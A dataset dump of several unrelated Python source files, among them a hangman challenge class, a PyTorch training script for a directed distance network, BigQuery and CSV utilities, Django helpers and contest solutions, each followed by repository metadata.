sender_data["challenge_victories"] = self._sender.performance.challenge_victories
player_data["challenge_defeats"] = self.player.performance.challenge_defeats
self._sender.performance.calculate_new_yield_coefficient()
self.player.performance.calculate_new_yield_coefficient()
sender_data["yield_coefficient"] = self._sender.performance.yield_coefficient
player_data["yield_coefficient"] = self.player.performance.yield_coefficient
db = DatabaseManager()
db.update_record("players", sender_data, {"nickname": self._sender.nickname})
db.update_record("players", player_data, {"nickname": self.player.nickname})
db.delete_record("challenges", {"receiver_nickname": self.player.nickname,
"sender_nickname": self._sender.nickname, "timestamp": self._timestamp})
def __str__(self):
data = (
self._word.word,
self._chances,
self.player.nickname,
self._sender.nickname,
self._timestamp
)
return data.__str__()
@classmethod
def instantiate(cls, challenge_data: tuple):
assert len(challenge_data) == 5, "Data is invalid"
from extra.data_persistence.database_manager import DatabaseManager
from extra.word.word import Word
db = DatabaseManager()
receiver_player = db.select_player(challenge_data[2])
sender_player = db.select_player(challenge_data[3])
word_tuple = db.inspect_table("words", "*", {"word": challenge_data[0]}, "word")[0]
assert len(word_tuple) == 3, "Word tuple is invalid"
word = Word(word_tuple[0], word_tuple[1], word_tuple[2])
return cls(word, receiver_player, sender_player, challenge_data[1], challenge_data[4])
| Fael123Programming/hangman-game-py | src/extra/challenge/challenge.py | challenge.py | py | 3,562 | python | en | code | 0 | github-code | 90 |
26988005872 | import os
from .img_recognition import recongnition
class Method(object):
def image_save(request, userId):
"""
将用户上传的照片保存到服务器,并返回照片保存的路径
"""
import time
p = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
post_time = time.strftime('%Y-%m-%d_%H-%M-%S_')+'%s.jpg' % userId # 照片命名 时间加学号
if request.method == 'POST':
img = request.FILES.get('file')
path = os.path.join(p, 'images', post_time)
with open(path, 'wb') as f:
for line in img.chunks():
f.write(line)
return path
def image_processing(path):
"""
图像处理,得到返回的数据,成功返回字典结果, 失败返回False
"""
a = recongnition(path)
return a
def data_processing(s):
"""
处理图像分析后的数据,返回result字典
"""
result = {'status':False, 'message':'', 'site': '', 'credit':''} # status:状态 message:向前端传递的消息 site垃圾箱编号 credit 加的分数
menu = {'plastic':'塑料瓶', 'cans':'易拉罐', 'glass':'玻璃瓶', 'others':'others'}
list1 = []
for key, item in s[2].items():
if item > 0:
list1.append(menu.get(key))
if menu.get(s[1]) in list1:
if 'others' in list1:
list1.remove('others')
if len(list1) == 1:
result['status'] = True
result['message'] = '回收%s成功, 公益积分加%s分。' % (menu.get(s[1]), s[2].get(s[1]))
result['site'] = s[0]
result['credit'] = s[2].get(s[1])
return result
else:
list1.remove(menu.get(s[1]))
w = ' '.join(list1)
result['message'] = '除了%s还有%s, 请分类回收' % (menu.get(s[1]), w)
return result
else:
result['message'] = '请放入%s' % menu.get(s[1])
return result
| wanghaininggg/Garbage-collection | code/wx_project/app1/function/processing.py | processing.py | py | 2,142 | python | en | code | 0 | github-code | 90 |
18244674659 | k,n = map(int,input().split())
A=list(map(int,input().split()) )
ans=10**10
for i in range(len(A)):
#時計回り iからi-1に行く
#0を超えない
if A[i-1] - A[i] > 0:
dist1 = A[i-1] - A[i]
#0を超える
else:
dist1 = A[i-1] + (k-A[i])
#反時計回り i-1からiに行く
if A[i] - A[i-1] < 0:
dist2 = A[i-1] - A[i]
#0を超える
else:
dist2 = A[i] + (k-A[i-1])
dist = min(dist1,dist2)
ans = min(ans,dist)
print(ans) | Aasthaengg/IBMdataset | Python_codes/p02725/s627644691.py | s627644691.py | py | 585 | python | en | code | 0 | github-code | 90 |
16836061380 | '''
Train a directed sdf network
'''
import torch
import torch.nn as nn
from torch.utils.data import DataLoader
import argparse
import os
from tqdm import tqdm
import numpy as np
from sklearn.metrics import confusion_matrix
import matplotlib.pyplot as plt
import trimesh
import math
# from beacon.utils import saveLossesCurve
from data import DepthData, MultiDepthDataset
from model import LF4D, AdaptedLFN, SimpleMLP
import odf_utils
from camera import Camera, DepthMapViewer, save_video, save_video_4D
import sampling
import rasterization
import meshing_3d
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
torch.autograd.set_detect_anomaly(True)
def l2_loss(labels, predictions):
'''
L2 loss
'''
# print("L2 Loss")
# print(labels[-10:])
# print(predictions[-10:])
return torch.mean(torch.square(labels - predictions))
def chamfer_loss_1d(ground_truth, predictions, gt_mask, pred_mask):
'''
A chamfer distance measure between a set of ground truth and predicted depth points
'''
ground_truth = ground_truth.unsqueeze(2)
predictions = predictions.unsqueeze(2)
# we need to mask out the elements that aren't labeled as true intersections
extended_gt_mask = gt_mask.unsqueeze(2)
extended_gt_mask = extended_gt_mask.tile((1,1,pred_mask.shape[1]))
extended_pred_mask = pred_mask.unsqueeze(1)
extended_pred_mask = extended_pred_mask.tile((1,gt_mask.shape[1],1))
joint_mask = torch.logical_and(extended_pred_mask, extended_gt_mask)
dists = torch.cdist(ground_truth, predictions)
# this step is solely to allow us to mask out certain values in a differentiable manner
# dists = 1. / (dists + 0.01)
# dists[torch.logical_not(joint_mask)] *= -1
# gt_term = torch.mean(1. / torch.max(dists, dim=2)[0] - 0.01)
# pred_term = torch.mean(1. / torch.max(dists, dim=1)[0] - 0.01)
masked_dists = torch.where(joint_mask, dists, torch.tensor(np.inf).to(device))
# find the nearest point in the opposing set (mask out inf values in current set)
gt_term = torch.min(masked_dists, dim=2)[0]
gt_term = torch.where(gt_mask, gt_term, torch.tensor(0.).to(device))
gt_term = torch.sum(gt_term, dim=1) / torch.sum(gt_mask, dim=1)
gt_term = torch.mean(gt_term)
# print("GT TERM")
# print(torch.min(masked_dists, dim=2)[0][gt_mask])
# pred_term = torch.mean(torch.min(masked_dists, dim=1)[0][pred_mask])
pred_term = torch.min(masked_dists, dim=1)[0]
pred_term = torch.where(pred_mask, pred_term, torch.tensor(0.).to(device))
pred_term = torch.sum(pred_term, dim=1) / torch.sum(pred_mask, dim=1)
pred_term = torch.mean(pred_term)
# print("PRED TERM")
# print(torch.min(masked_dists, dim=1)[0][pred_mask])
return 0.5 * (gt_term + pred_term)
def intersection_count_loss(ground_truth, predictions):
# seems like this might zero out the gradients
return torch.mean(torch.sqrt(torch.square(torch.sum(ground_truth > 0.5, dim=1) - torch.sum(predictions > 0.5, dim=1))))
def push_top_n(gt_int, pred_int):
'''
If there are n intersections, labels the top n intersection outputs as the largest
'''
n_ints = torch.sum(gt_int, dim=1)
pred_sorted = torch.sort(pred_int, dim=1)[0]
sorted_labels = torch.zeros(pred_sorted.shape)
for i in sorted_labels.shape[0]:
sorted_labels[i, :n_ints[i]] = 1.
bce = nn.BCELoss(reduction="mean")
return bce(pred_sorted, sorted_labels.to(device))
def train_epoch(model, train_loader, optimizer, lmbda, coord_type, unordered=False):
ce = nn.CrossEntropyLoss(reduction="mean")
bce = nn.BCELoss(reduction="mean")
total_loss = 0.
sum_int_loss = 0.
sum_depth_loss = 0.
total_batches = 0
for batch in tqdm(train_loader):
coordinates = batch[f"coordinates_{coord_type}"].to(device)
intersect = batch["intersect"].to(device)
n_ints = batch["n_ints"].to(device)
depth = batch["depths"].to(device)
pred_int, pred_depth = model(coordinates)
if unordered:
# mask of rays that have any intersections (gt & predicted)
gt_any_int_mask = torch.any(intersect > 0.5, dim=1)
pred_any_int_mask = torch.any(pred_int > 0.5, dim=1)
combined_int_mask = torch.logical_and(gt_any_int_mask, pred_any_int_mask)
depth_loss = lmbda * chamfer_loss_1d(depth[combined_int_mask], pred_depth[combined_int_mask], (intersect > 0.5)[combined_int_mask], (pred_int > 0.5)[combined_int_mask])
intersect_loss = push_top_n(intersect, pred_int)
else:
intersect = intersect.reshape((-1,))
depth = depth.reshape((-1,))
pred_depth = pred_depth.reshape((-1,))
n_ints = n_ints.reshape((-1))
# create mask from intersection values
# depth_mask = torch.nn.functional.one_hot(intersect.to(torch.int64), pred_int.shape[1])
# depth_mask = torch.cumsum(depth_mask, dim=1)
# depth_mask = torch.logical_not(depth_mask)
# depth_mask = depth_mask[:,:-1]
# depth_mask = depth_mask.reshape((-1))
depth_loss = lmbda * l2_loss(depth[intersect > 0.5], pred_depth[intersect > 0.5])
intersect_loss = ce(pred_int, n_ints.long())
loss = intersect_loss + depth_loss
optimizer.zero_grad()
loss.backward()
optimizer.step()
sum_int_loss += intersect_loss.detach()
sum_depth_loss += depth_loss.detach()
total_loss += loss.detach()
total_batches += 1.
avg_loss = float(total_loss/total_batches)
avg_int_loss = float(sum_int_loss/total_batches)
avg_depth_loss = float(sum_depth_loss/total_batches)
print(f"Average Loss: {avg_loss:.4f}")
print(f"Average Intersect Loss: {avg_int_loss:.4f}")
print(f"Average Depth Loss: {avg_depth_loss:.4f}")
return avg_loss, avg_int_loss, avg_depth_loss
def test(model, test_loader, lmbda, coord_type, unordered=False):
ce = nn.CrossEntropyLoss(reduction="mean")
bce = nn.BCELoss(reduction="mean")
total_loss = 0.
total_batches = 0.
total_chamfer = 0.
all_depth_errors = []
all_int_pred = []
all_int_label = []
int_tn = 0.
int_fp = 0.
int_fn = 0.
int_tp = 0.
with torch.no_grad():
for batch in tqdm(test_loader):
coordinates = batch[f"coordinates_{coord_type}"].to(device)
intersect = batch["intersect"].to(device)
n_ints = batch["n_ints"].to(device)
depth = batch["depths"].to(device)
pred_int, pred_depth = model(coordinates)
if unordered:
# mask of rays that have any intersections (gt & predicted)
gt_any_int_mask = torch.any(intersect > 0.5, dim=1)
pred_any_int_mask = torch.any(pred_int > 0.5, dim=1)
combined_int_mask = torch.logical_and(gt_any_int_mask, pred_any_int_mask)
depth_loss = lmbda * chamfer_loss_1d(depth[combined_int_mask], pred_depth[combined_int_mask], (intersect > 0.5)[combined_int_mask], (pred_int > 0.5)[combined_int_mask])
intersect_loss = push_top_n(intersect, pred_int)
else:
intersect = intersect.reshape((-1,))
depth = depth.reshape((-1,))
pred_depth = pred_depth.reshape((-1,))
n_ints = n_ints.reshape((-1))
depth_loss = lmbda * l2_loss(depth[intersect > 0.5], pred_depth[intersect > 0.5])
intersect_loss = ce(pred_int, n_ints.long())
# this is all to compute the confusion matrix
pred_n_ints = torch.argmax(pred_int, dim=1)
# create binary labels for each intersection
pred_int_mask = torch.nn.functional.one_hot(pred_n_ints.to(torch.int64), pred_int.shape[1])
pred_int_mask = torch.cumsum(pred_int_mask, dim=1)
pred_int_mask = torch.logical_not(pred_int_mask)
pred_int_mask = pred_int_mask[:,:-1]
pred_int_mask = pred_int_mask.reshape((-1)).cpu().numpy()
all_int_pred.append(pred_int_mask)
loss = intersect_loss + depth_loss
all_depth_errors.append(torch.abs(depth[intersect > 0.5] - pred_depth[intersect > 0.5]).cpu().numpy())
# all_int_pred.append(pred_int.cpu().numpy().flatten())
all_int_label.append(intersect.cpu().numpy().flatten())
if unordered:
total_chamfer += depth_loss / lmbda
total_loss += loss.detach()
total_batches += 1.
print(f"\nAverage Test Loss: {float(total_loss/total_batches):.4f}")
if unordered:
print(f"Average Chamfer Loss: {(total_chamfer / total_batches):.4f}")
print("Confusion Matrix Layout:")
print("[[TN FP]\n [FN TP]]")
print("\nIntersection-")
int_confusion_mat = confusion_matrix(np.hstack(all_int_label), np.hstack(all_int_pred)>0.5)
int_tn = int_confusion_mat[0][0]
int_fp = int_confusion_mat[0][1]
int_fn = int_confusion_mat[1][0]
int_tp = int_confusion_mat[1][1]
int_precision = int_tp/(int_tp + int_fp)
int_recall = int_tp/(int_tp + int_fn)
int_accuracy = (int_tn + int_tp)/np.sum(int_confusion_mat)
print(f"Average Intersect Accuracy: {float(int_accuracy*100):.2f}%")
print(f"Intersect Precision: {int_precision*100:.2f}%")
print(f"Intersect Recall: {int_recall*100:.2f}%")
print(f"Intersect F1: {2*(int_precision*int_recall)/(int_precision + int_recall):.4f}")
print(int_confusion_mat)
print("\nDepth-")
all_depth_errors = np.hstack(all_depth_errors)
print(f"Average Depth Error: {np.mean(all_depth_errors):.4f}")
print(f"Median Depth Error: {np.median(all_depth_errors):.4f}\n")
def viz_depth(model, verts, faces, radius, show_rays=False):
'''
Visualize learned depth map and intersection mask compared to the ground truth
TODO: add depth map legend
'''
# these are the normalization bounds for coloring in the video
# vmin = radius - 1.
# vmax = radius + 1.
fl = 1.0
sensor_size = [1.0,1.0]
resolution = [100,100]
zoom_out_cameras = [Camera(center=[1.25 + 0.2*x,0.0,0.0], direction=[-1.0,0.0,0.0], focal_length=fl, sensor_size=sensor_size, sensor_resolution=resolution) for x in range(4)]
data = [cam.mesh_and_model_depthmap(model, verts, faces, radius, show_rays=show_rays, fourd=True) for cam in zoom_out_cameras]
vmin = [min(np.min(mesh_depths[mesh_n_ints > 0.5]) if np.any(mesh_n_ints > 0.5) else np.inf, np.min(model_depths[model_n_ints > 0.5]) if np.any(model_n_ints > 0.5) else np.inf) for mesh_n_ints, mesh_depths, model_n_ints, model_depths in data]
vmax = [max(np.max(mesh_depths[mesh_n_ints > 0.5]) if np.any(mesh_n_ints > 0.5) else -np.inf, np.max(model_depths[model_n_ints > 0.5]) if np.any(model_n_ints > 0.5) else -np.inf) for mesh_n_ints, mesh_depths, model_n_ints, model_depths in data]
vmin = [vmin[i] if vmin[i] < np.inf else np.min(data[i][3]) for i in range(len(vmin))]
vmax = [vmax[i] if vmax[i] > -np.inf else np.max(data[i][3]) for i in range(len(vmax))]
DepthMapViewer(data, vmin, vmax, fourd=True)
def equatorial_video(model, verts, faces, radius, n_frames, resolution, save_dir, name):
'''
Saves a rendered depth video from around the equator of the object
'''
video_dir = os.path.join(save_dir, "depth_videos")
if not os.path.exists(video_dir):
os.mkdir(video_dir)
# these are the normalization bounds for coloring in the video
vmin = radius - 1.
vmax = radius + 1.
fl = 1.0
sensor_size = [1.0,1.0]
resolution = [resolution,resolution]
angle_increment = 2*math.pi / n_frames
z_vals = [np.cos(angle_increment*i)*radius for i in range(n_frames)]
x_vals = [np.sin(angle_increment*i)*radius for i in range(n_frames)]
circle_cameras = [Camera(center=[x_vals[i],0.0,z_vals[i]], direction=[-x_vals[i],0.0,-z_vals[i]], focal_length=fl, sensor_size=sensor_size, sensor_resolution=resolution, verbose=False) for i in range(n_frames)]
rendered_views = [cam.mesh_and_model_depthmap(model, verts, faces, radius, fourd=True) for cam in tqdm(circle_cameras)]
save_video_4D(rendered_views, os.path.join(video_dir, f'4D_equatorial_{name}_rad{radius*100:.0f}.mp4'), vmin, vmax)
def generate_point_cloud(model, sphere_vertices, vertices, faces, focal_point=[0., 0., 0.], show=True):
'''
Returns the 1st, 2nd, 3rd, and 4th+ intersection point clouds produced by shooting rays from the
sphere vertices towards the focal point
'''
focal_point = np.array(focal_point)
# pointclouds = [[],[],[],[]]
ray_directions = [(focal_point-v) / np.linalg.norm(focal_point-v) for v in sphere_vertices]
with torch.no_grad():
# pass in surface point, direction
_, depths, n_ints = model.query_rays(torch.tensor(sphere_vertices, dtype=torch.float32), torch.tensor(ray_directions, dtype=torch.float32))
n_ints = n_ints.cpu()
model_depths = depths.cpu()
model_depths = torch.min(model_depths, dim=1)[0]
model_depths = model_depths.numpy()
new_points = [sphere_vertices[i] + ray_directions[i]*model_depths[i] if model_depths[i] < np.inf else None for i in range(len(sphere_vertices))]
if show:
# can't import visualization on OSCAR because it uses Open3D and OpenGL
import visualization
lines = np.concatenate([faces[:,:2], faces[:,1:], faces[:,[0,2]]], axis=0)
visualizer = visualization.RayVisualizer(vertices, lines)
for point in new_points:
if point is not None:
visualizer.add_point(point, [52./255., 88./255., 235./255.])
visualizer.display()
# TODO: save to file
return new_points
def generate_simple_mesh(model, sphere_vertices, sphere_faces, focal_point=[0.,0.,0.], show=True):
'''
Returns a mesh produced by shooting rays from the sphere vertices towards the focal point
'''
focal_point = np.array(focal_point)
ray_directions = [(focal_point-v) / np.linalg.norm(focal_point-v) for v in sphere_vertices]
with torch.no_grad():
# pass in surface point, direction
_, depths, n_ints = model.query_rays(torch.tensor(sphere_vertices, dtype=torch.float32), torch.tensor(ray_directions, dtype=torch.float32))
n_ints = n_ints.cpu()
model_depths = depths.cpu()
model_depths = torch.min(model_depths, dim=1)[0]
model_depths = model_depths.numpy()
new_points = [sphere_vertices[i] + ray_directions[i]*model_depths[i] if model_depths[i] < np.inf else sphere_vertices[i] for i in range(len(sphere_vertices))]
if show:
# can't import visualization on OSCAR because it uses Open3D and OpenGL
import visualization
import open3d as o3d
o3d.visualization.draw_geometries([visualization.make_mesh(np.array(new_points), sphere_faces)])
# TODO: save to file
return new_points
if __name__ == "__main__":
print(f"Using {device}")
parser = argparse.ArgumentParser(description="A script to train and evaluate a directed distance function network")
# CONFIG
parser.add_argument("--n_workers", type=int, default=0, help="Number of workers for dataloaders. Recommended is 2*num cores")
parser.add_argument("--save_dir", type=str, default="/gpfs/data/ssrinath/human-modeling/DirectedDF/large_files/", help="a directory where model weights, loss curves, and visualizations will be saved")
parser.add_argument("-n", "--name", type=str, required=True, help="The name of the model")
# DATA
parser.add_argument("--samples_per_mesh", type=int, default=1000000, help="Number of rays to sample for each mesh")
parser.add_argument("--mesh_file", default="/gpfs/data/ssrinath/human-modeling/large_files/sample_data/stanford_bunny.obj", help="Source of mesh to train on")
# NOTE: Double check LF4D and Camera class if coord type/ pos enc change
parser.add_argument("--coord_type", default="direction", help="Type of coordinates to use, valid options are 'points' | 'direction' | 'pluecker' ")
parser.add_argument("--pos_enc", default=True, type=bool, help="Whether NeRF-style positional encoding should be applied to the data")
parser.add_argument("--vert_noise", type=float, default=0.02, help="Standard deviation of noise to add to vertex sampling methods")
parser.add_argument("--tan_noise", type=float, default=0.02, help="Standard deviation of noise to add to tangent sampling method")
parser.add_argument("--uniform", type=int, default=100, help="What percentage of the data should be uniformly sampled (0 -> 0%, 100 -> 100%)")
parser.add_argument("--vertex", type=int, default=0, help="What percentage of the data should use vertex sampling (0 -> 0%, 100 -> 100%)")
parser.add_argument("--tangent", type=int, default=0, help="What percentage of the data should use vertex tangent sampling (0 -> 0%, 100 -> 100%)")
# "F:\\ivl-data\\sample_data\\stanford_bunny.obj"
# MODEL
parser.add_argument("--lmbda", type=float, default=100., help="Multiplier for depth l2 loss")
parser.add_argument("--intersect_limit", type=int, default=20, help="Max number of intersections that the network will predict per ray (should be even number)")
parser.add_argument("--unordered", action="store_true", help="The intersection outputs will have no ordering constraint if this argument is passed")
# HYPERPARAMETERS
parser.add_argument("--lr", type=float, default=1e-4, help="Learning rate")
parser.add_argument("--train_batch_size", type=int, default=1000, help="Train batch size")
parser.add_argument("--test_batch_size", type=int, default=1000, help="Test batch size")
parser.add_argument("--epochs", type=int, default=3, help="Number of epochs to train (overrides --iterations)")
parser.add_argument("--radius", type=float, default=1.25, help="The radius at which all rays start and end (mesh is normalized to be in unit sphere)")
# ACTIONS
parser.add_argument("-T", "--train", action="store_true", help="Train the network")
parser.add_argument("-t", "--test", action="store_true", help="Test the network")
parser.add_argument("-s", "--save", action="store_true", help="Save the trained network")
parser.add_argument("-l", "--load", action="store_true", help="Load the model from file")
parser.add_argument("-d", "--viz_depth", action="store_true", help="Visualize the learned depth map and intersection mask versus the ground truth")
parser.add_argument("-v", "--video", action="store_true", help="Render a video of the learned mask and depth map compared to the ground truth")
parser.add_argument("-p", "--pointcloud", action="store_true", help="Generate a point cloud of the object based on the learned ODF")
parser.add_argument("-m", "--mesh", action="store_true", help="Visualize a mesh generated from rays starting on a sphere surface looking inwards")
# VISUALIZATION
parser.add_argument("--show_rays", action="store_true", help="Visualize the camera's rays relative to the scene when rendering depthmaps")
parser.add_argument("--n_frames", type=int, default=200, help="Number of frames to render if saving video")
parser.add_argument("--video_resolution", type=int, default=250, help="The height and width of the rendered video (in pixels)")
args = parser.parse_args()
# make sure the output directory is setup correctly
assert(os.path.exists(args.save_dir))
necessary_subdirs = ["saved_models", "loss_curves"]
for subdir in necessary_subdirs:
if not os.path.exists(os.path.join(args.save_dir, subdir)):
os.mkdir(os.path.join(args.save_dir, subdir))
model_path = os.path.join(args.save_dir, "saved_models", f"{args.name}.pt")
loss_path = os.path.join(args.save_dir, "loss_curves", args.name)
model = LF4D(input_size=(120 if args.pos_enc else 6), n_intersections=args.intersect_limit, radius=args.radius, coord_type=args.coord_type, pos_enc=args.pos_enc).to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr)
mesh = trimesh.load(args.mesh_file)
faces = mesh.faces
verts = mesh.vertices
verts = odf_utils.mesh_normalize(verts)
sampling_methods = [sampling.sample_uniform_4D,
sampling.sampling_preset_noise(sampling.sample_vertex_4D, args.vert_noise),
sampling.sampling_preset_noise(sampling.sample_tangential_4D, args.tan_noise)]
sampling_frequency = [0.01 * args.uniform, 0.01 * args.vertex, 0.01*args.tangent]
assert(sum(sampling_frequency) == 1.0)
test_sampling_frequency = [1., 0., 0.]
train_data = MultiDepthDataset(faces, verts, args.radius, sampling_methods, sampling_frequency, size=args.samples_per_mesh, intersect_limit=args.intersect_limit, pos_enc=args.pos_enc)
test_data = MultiDepthDataset(faces,verts,args.radius, sampling_methods, sampling_frequency, size=int(args.samples_per_mesh*0.1), intersect_limit=args.intersect_limit, pos_enc=args.pos_enc)
# TODO: num_workers=args.n_workers
train_loader = DataLoader(train_data, batch_size=args.train_batch_size, shuffle=True, drop_last=True, pin_memory=True, num_workers=args.n_workers)
test_loader = DataLoader(test_data, batch_size=args.test_batch_size, shuffle=True, drop_last=True, pin_memory=True, num_workers=args.n_workers)
if args.load:
print("Loading saved model...")
model.load_state_dict(torch.load(model_path, map_location=torch.device(device)))
if args.train:
print(f"Training for {args.epochs} epochs...")
model=model.train()
total_loss = []
int_loss = []
depth_loss = []
for e in range(args.epochs):
print(f"EPOCH {e+1}")
tl, il, dl = train_epoch(model, train_loader, optimizer, args.lmbda, args.coord_type, unordered=args.unordered)
total_loss.append(tl)
int_loss.append(il)
depth_loss.append(dl)
odf_utils.saveLossesCurve(total_loss, int_loss, depth_loss, legend=["Total", "Intersection", "Depth"], out_path=loss_path, log=True)
if args.save:
print("Saving model...")
torch.save(model.state_dict(), model_path)
if args.test:
print("Testing model ...")
model=model.eval()
test(model, test_loader, args.lmbda, args.coord_type, unordered=args.unordered)
if args.viz_depth:
print("Visualizing depth map...")
model=model.eval()
viz_depth(model, verts, faces, args.radius, args.show_rays)
if args.pointcloud:
model = model.eval()
sphere_vertices, _ = meshing_3d.icosahedron_sphere_tessalation(args.radius, subdivisions=4)
generate_point_cloud(model, sphere_vertices, verts, faces)
if args.mesh:
model = model.eval()
meshing_3d.make_model_mesh(model, initial_tessalation_factor=3, radius=args.radius, focal_point=[0.,0.,0.])
# sphere_vertices, sphere_faces = meshing_3d.icosahedron_sphere_tessalation(args.radius, subdivisions=4)
# generate_simple_mesh(model, sphere_vertices, sphere_faces)
if args.video:
print(f"Rendering ({args.video_resolution}x{args.video_resolution}) video with {args.n_frames} frames...")
model=model.eval()
equatorial_video(model, verts, faces, args.radius, args.n_frames, args.video_resolution, args.save_dir, args.name)
# print name again so it's at the bottom of the slurm output
print(f"{args.name} finished")
| brown-ivl/DirectedDistanceFunction | train4D.py | train4D.py | py | 23,695 | python | en | code | 2 | github-code | 90 |
18348694269 | import sys
input = sys.stdin.readline
def I(): return int(input())
def MI(): return map(int, input().split())
def LI(): return list(map(int, input().split()))
def main():
mod=10**9+7
N=I()
A=[]
inf=10**6
for _ in range(N):
a=LI()+[inf]
for j in range(N-1):
a[j]-=1
A.append(a)
cur=[0]*N#i番目の人が何試合消化したか
st=[]# stackに,みるべき人を入れていいく,変化があった人だけ見れば良い
nxt=[]
#初日は全員みる,N>=3より初日で終わることはない
for i in range(N):
for j in range(i+1,N):
if A[i][0]==j and A[j][0]==i:
cur[i]=1
cur[j]=1
st.append(i)
st.append(j)
day=1
while st:
used=[0]*N
day+=1
while st:
i=st.pop()#みる人
j=A[i][cur[i]]#相手候補
if used[i]==0 and used[j]==0:
if A[j][cur[j]]==i:#マッチング
cur[i]+=1
cur[j]+=1
nxt.append(i)
nxt.append(j)
used[i]=1
used[j]=1
while nxt:
a=nxt.pop()
if cur[a]!=N-1:
st.append(a)
if sum(cur)==N*(N-1):
print(day)
else:
print(-1)
main()
| Aasthaengg/IBMdataset | Python_codes/p02925/s455447579.py | s455447579.py | py | 1,519 | python | ja | code | 0 | github-code | 90 |
71939857257 | from django.core.management import call_command
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from faker import Faker
fake = Faker()
User = get_user_model()
class MiddlewareTests(TestCase):
@classmethod
def setUpTestData(cls):
call_command("init_membership")
user = User.objects.create(username=fake.user_name(), email=fake.ascii_email())
cls.user = user
def test_complete_user_profile_middleware(self):
self.client.force_login(self.user)
response = self.client.get("/")
self.assertEqual(response.url, reverse("accounts:update-profile") + "?next=/")
self.user.profile.country = "MU"
self.user.profile.save()
response = self.client.get("/")
self.assertEqual(response.request["PATH_INFO"], "/")
| confuzeus/sasaas | {{ cookiecutter.project_slug }}/{{ cookiecutter.project_slug }}/accounts/tests/test_middleware.py | test_middleware.py | py | 856 | python | en | code | 7 | github-code | 90 |
20572640854 | import csv
# Open the "allpro" file in read mode
with open('allpro', 'r') as file:
# Read the content of the file
content = file.read()
# Split the content into individual entries
entries = content.split('\n\n')
# Create a new CSV file to write the parsed data
with open('parsed_data.csv', 'w', newline='') as output_file:
# Create a CSV writer object
csv_writer = csv.writer(output_file)
# Write the header row to the CSV file
csv_writer.writerow(['Company', 'Address', 'City', 'State', 'Zip Code', 'Phone'])
# Iterate over each entry
for entry in entries:
# Split the entry into lines
lines = entry.split('\n')
# Extract the relevant data from the entry
if len(lines) >= 3:
company = lines[0].strip()
address = lines[1].strip()
city_state_zip = lines[2].strip()
phone = lines[-1].replace('Phone:', '').strip()
# Split the city, state, and zip code
city, state_zip = city_state_zip.rsplit(' ', 1)
state, zipcode = state_zip[:2], state_zip[2:]
# Write the parsed data to the CSV file
csv_writer.writerow([company, address, city, state, zipcode, phone])
| alba-molina-nyc/allpro | par.py | par.py | py | 1,325 | python | en | code | 0 | github-code | 90 |
26295879475 | # -*- coding: utf-8 -*-
"""
Created on Thu Jun 10 12:37:43 2021
@author: Peter
"""
import FindSmallestSphere2Points
import FindSmallestSphere3Points
import FindSmallestSphere4Points
def main(points_array):
two_p_sphere = FindSmallestSphere2Points.main(points_array)
if two_p_sphere is not None:
print("Two point sphere")
return two_p_sphere
three_p_sphere = FindSmallestSphere3Points.main(points_array)
if three_p_sphere[0] is not None and three_p_sphere[2]:
print("Three point sphere")
return three_p_sphere
print("Four point sphere")
four_p_sphere = FindSmallestSphere4Points.main(points_array)
# if (three_p_sphere != None):
# print("Three Radius:" + format(three_p_sphere[0]))
# print("Three status: " + format(three_p_sphere[2]))
# print("Four Radius: " + format(four_p_sphere[0]))
# if (three_p_sphere[0] != None and three_p_sphere[0] < four_p_sphere[0]):
# return three_p_sphere
return four_p_sphere
| georgesquinn/geometric-protein | FindSmallestSphere.py | FindSmallestSphere.py | py | 1,010 | python | en | code | 0 | github-code | 90 |
70278388778 | import six
import os
from dotenv import load_dotenv
from google.cloud import bigquery
load_dotenv()
project_name = os.environ.get('PROJECT_NAME')
dataset_name = os.environ.get('DATASET_NAME')
bucket_name = os.environ.get('BUCKET_NAME')
table_name = 'doraneko'
client = bigquery.Client()
table_id = f"{project_name}.{dataset_name}.{table_name}"
job_config = bigquery.LoadJobConfig(
schema=[
bigquery.SchemaField("name", "STRING"),
bigquery.SchemaField("post_abbr", "STRING"),
],
)
body = six.BytesIO(b"Washington,WA")
client.load_table_from_file(body, table_id, job_config=job_config).result()
previous_rows = client.get_table(table_id).num_rows
assert previous_rows > 0
job_config = bigquery.LoadJobConfig(
write_disposition=bigquery.WriteDisposition.WRITE_TRUNCATE,
source_format=bigquery.SourceFormat.CSV,
skip_leading_rows=1,
)
uri = f"gs://{bucket_name}/mycsv2.csv"
load_job = client.load_table_from_uri(
uri, table_id, job_config=job_config
) # Make an API request.
load_job.result() # Waits for the job to complete.
destination_table = client.get_table(table_id)
print("Loaded {} rows.".format(destination_table.num_rows))
| nuevocs/gcp-bq-python | sample-scripts/replace_table.py | replace_table.py | py | 1,182 | python | en | code | 0 | github-code | 90 |
18163025089 | def abc177_e():
n = int(input())
A = [int(x) for x in input().split()]
def prime_factorize(n:int)->set:
''' nの素因数分解 '''
arr = []
while n % 2 == 0:
arr.append(2)
n = n // 2
f = 3
while f*f <= n:
if n%f == 0:
arr.append(f)
n = n // f
else:
f += 2
if n != 1:
arr.append(n)
return set(arr)
import math
gcd_all = A[0]
factors = [0]*(10**6 + 1)
pairwise = True
for ai in A:
gcd_all = math.gcd(gcd_all, ai)
for p in prime_factorize(ai):
if factors[p]: pairwise = False
factors[p] = 1
if pairwise: ans = 'pairwise coprime'
elif gcd_all == 1: ans = 'setwise coprime'
else: ans = 'not coprime'
print(ans)
if __name__ == '__main__':
abc177_e() | Aasthaengg/IBMdataset | Python_codes/p02574/s460995164.py | s460995164.py | py | 905 | python | en | code | 0 | github-code | 90 |
38321578350 | """
Meshing: Filter prisms from a 3D prism mesh based on their physical properties
"""
from fatiando import logger, gridder, mesher
from fatiando.vis import myv
log = logger.get()
log.info(logger.header())
log.info(__doc__)
shape = (5, 20, 10)
bounds = (0, 100, 0, 200, 0, 50)
mesh = mesher.PrismMesh(bounds, shape)
# Fill the even prisms with 1 and odd with -1
def fill(i):
if i%2 == 0:
return 1
return -1
mesh.addprop('density', [fill(i) for i in xrange(mesh.size)])
# Separate even and odd prisms
odd = mesher.vfilter(-1, 0, 'density', mesh)
even = mesher.vfilter(0, 1, 'density', mesh)
log.info("Showing solid ODD prisms and wireframe EVEN")
myv.figure()
myv.prisms(odd, prop='density', vmin=-1, vmax=1)
myv.prisms(even, prop='density', style='wireframe', vmin=-1, vmax=1)
myv.axes(myv.outline(bounds))
myv.show()
